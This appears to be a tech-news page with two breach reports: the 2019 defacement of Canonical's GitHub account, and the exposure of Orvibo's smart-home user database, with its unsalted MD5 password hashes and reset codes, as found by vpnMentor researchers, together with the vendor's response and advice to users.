cryptographic library that can quickly “take down a windows fleet” All about Browser Fingerprinting, the privacy nightmare that keeps web developers awake at night

On Saturday, Ubuntu-maker Canonical Ltd’s source code repositories were compromised and used to create repositories and issues among other activities. The unknown attacker(s) used a Canonical owned GitHub account whose credentials were compromised to unauthorizedly access Canonical's Github account. According to a mirror of the hacked Canonical GitHub account, the hacker created 11 new GitHub repositories in the official Canonical account. The repositories were empty and  sequentially named CAN_GOT_HAXXD_1, `with no existing data being changed or deleted. The Ubuntu source code remains unaffected. A Canonical representative said in a statement, “There is no indication at this point that any source code or PII was affected. Furthermore, the Launchpad infrastructure where the Ubuntu distribution is built and maintained is disconnected from GitHub and there is also no indication that it has been affected.” The hack appears to be limited to a defacement, as if the hacker(s) had added malicious code to Canonical projects, then they wouldn't have drawn attention by creating new repositories in the Canonical GitHub account. The official Ubuntu forums had been hacked on three different occasions, first in July 2013, when hackers stole the details of 1.82 million users. Second in July 2016, when the data of two million users was compromised. Third, in December 2016 when Ubuntu Forums was hacked with 1.8 Million users credentials stolen. In May, this year attackers wiped many GitHub, GitLab, and Bitbucket repos with ‘compromised’ valid credentials leaving behind a ransom note. Canonical has since removed the compromised account from the Canonical organisation in GitHub and is still investigating the extent of the breach. The Ubuntu security team said it plans to post a public update after our investigation, audit and remediations are finished. Twitter was flooded with people warning others about the hack. https://twitter.com/zackwhittaker/status/1147683774492303360 https://twitter.com/gcluley/status/1147901110503575552 https://twitter.com/evanderburg/status/1147895949697568770     Ubuntu has decided to drop i386 (32-bit) architecture from Ubuntu 19.10 onwards DockerHub database breach exposes 190K customer data including tokens for GitHub and Bitbucket repositories Attackers wiped many GitHub, GitLab, and Bitbucket repos with ‘compromised’ valid credentials leaving behind a ransom note.

Security researchers, Noam Rotem and Ran Locar, from vpnMentor recently revealed in their report, that a Shenzhen-based Chinese IoT management platform company, Orvibo exposed its user database online without any password protection. The Elasticsearch database, which contains user data collected from smart home devices, includes ‘2 billion logs’ containing everything from user passwords to account reset codes and also a "smart" camera recorded conversations. Sample of Orvibo leaked data The data leaked included email addresses, passwords, precise geolocation, IP address, username, userID, family name and ID, smart device, device that accessed account, scheduling information, and account reset codes. Out of these, the password and password reset codes that are being logged create additional problems. Even though these had not been encrypted, they had been hashed using MD5. “Unfortunately, the MD5 algorithm used to hash these passwords isn't considered particularly secure as it has been found to contain a whole bunch of vulnerabilities”. "Orvibo does make some effort into concealing the passwords, which are hashed using MD5 without salt," the vpnMentor team said. However, saltless MD5 passwords are relatively easy to crack, which means that anyone with access to this database could hijack SmartMate accounts and possibly take control of a user's smart devices connected to a user's SmartMate-controlled smart home. The researchers said the reset codes were the most dangerous pieces of information found in the database. "These would be sent to a user to reset either their password or their email address," the report explains, continuing "with that information readily accessible, a hacker could lock a user out of their account without needing their password. Changing both a password and an email address could make the action irreversible." According to ZDNet, “The database was spotted in mid-June by the security team at vpnMentor, led by security researchers Noam Rotem and Ran Locar, who shared their findings with ZDNet last month and asked for help in notifying the vendor.” Since then, both vpnMentor and ZDNet have contacted the Chinese company to let it know about its security issue; however, at the time of writing, Orvibo has failed to respond or take any action. Forbes mentions, “The Orvibo website boasts of a secure cloud providing a "reliable smart home cloud platform," and goes on to mention how it "supports millions of IoT devices and guarantees the data safety." Geoff Tudor, general manager of Vizion.ai, told Forbes that Elasticsearch breaches are becoming almost everyday occurrences. "When first installed, Elasticsearch's API is completely open without any password protection," Tudor says, adding "all a hacker needs to do is to hit a URL with http://[serverIP]:9200 and a user can see if an Elasticsearch is operational. Then it takes a single command to search through the data stored in it..." Orvibo which claims to have  a lot of users, including private individuals with smart home systems but also hotels and other business customers. The vpnMentor report states that it found logs for users in China, Japan, Thailand, Mexico, France, Australia, Brazil, the United Kingdom, and the U.S. The report states, "With the information that has leaked. It's clear that there is nothing secure about these devices. Even having one of these devices installed could undermine, rather than enhance, your physical security." How can users secure their data and be safe? Jake Moore, a cybersecurity specialist at ESET said, “Criminal groups may have been aware of this vulnerability but it is unknown if anyone has taken advantage of this flaw yet. I'd hope it would be patched quite quickly now it is out." Moore further advises, "The best thing now for people affected is to make sure their smart device passwords are changed immediately to something long and complex along with other accounts where the same password may be reused," He further pointed out, "they may as well pull the plug on the device until it is fixed." Ilia Kolochenko, founder and CEO of web security company ImmuniWeb, can go a step further than changing their passwords and “file a legal complaint and deactivate any remote management of their homes if it is doable." Yesterday, Orvibo responded by saying that they had secured the database. They said, “Once we received this report on July 2nd, ORVIBO’s RD team took immediate actions to resolve security vulnerability”. The company said they have  taken the following solutions to resolve the issue: Resolved security vulnerability. Upgraded encryption mechanism of password. Upgrade the protection on users account and password resetting. Strengthening cooperation with professional cyber security companies to improve our system security. To know more about this news, read the complete vpnmentor report. NSA warns users of BlueKeep vulnerability; urges them to update their Windows systems Google researcher reveals an unpatched bug in Windows’ cryptographic library that can quickly “take down a windows fleet” How not to get hacked by state-sponsored actors